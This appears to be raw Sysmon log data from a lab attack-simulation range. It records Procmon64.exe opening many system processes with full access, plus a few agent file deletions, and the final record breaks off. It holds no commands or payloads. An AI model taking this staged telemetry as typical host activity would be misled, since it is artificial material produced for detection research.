10:51:59.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1B8017086BAEADCAD197EDEE094CE06,SHA256=8139D0660C1F54893A006C58F180762252A4AECD214D6E70ABA717B0017D337E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.790{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F129-6215-2300-000000003802}2720C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.779{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1C00-000000003802}1688C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.693{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1C00-000000003802}1688C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.690{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1700-000000003802}1460C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.663{C8EA50B7-11CF-6216-2205-000000003802}61686192C:\Windows\system32\wbem\wmiprvse.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\System32\combase.dll+24fd2|C:\Windows\System32\combase.dll+25cfe|C:\Windows\System32\combase.dll+25b0f|C:\Windows\System32\combase.dll+59378|C:\Windows\System32\combase.dll+58f90|C:\Windows\System32\combase.dll+65d74|C:\Windows\System32\combase.dll+c28b4|C:\Windows\System32\combase.dll+63011|C:\Windows\System32\combase.dll+647f0|C:\Windows\System32\combase.dll+217a|C:\Windows\System32\RPCRT4.dll+d5ff4|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000288772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.642{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F120-6215-1700-000000003802}1460C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.637{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.539{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.537{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.431{C8EA50B7-F11F-6215-1000-000000003802}3646160C:\Windows\system32\svchost.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+1016a|C:\Windows\system32\wbem\wbemcore.dll+2d15f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.390{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.317{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.317{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.316{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366d9|c:\windows\system32\rpcss.dll+3bec2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.315{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1100-000000003802}408C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.279{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A4B1CBC256B440B5D85286A7B641C7,SHA256=EE991D11E0D24D4803EA1E75A8DC097D0909A9DB649E45EE6D0DC36340DF639A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.245{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1100-000000003802}408C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:59.242{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:00.800{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-136MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:00.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F77F63F0CC9A859F940056B7E04EECB5,SHA256=356825A94E27A6DB9E7DC815C91CB4F32747D9CD077D37AAAB188777A7DFD6C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.967{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F1AB-6215-8500-000000003802}2868C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.965{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.913{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.912{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4600-000000003802}3804C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.881{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4600-000000003802}3804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.879{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.850{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 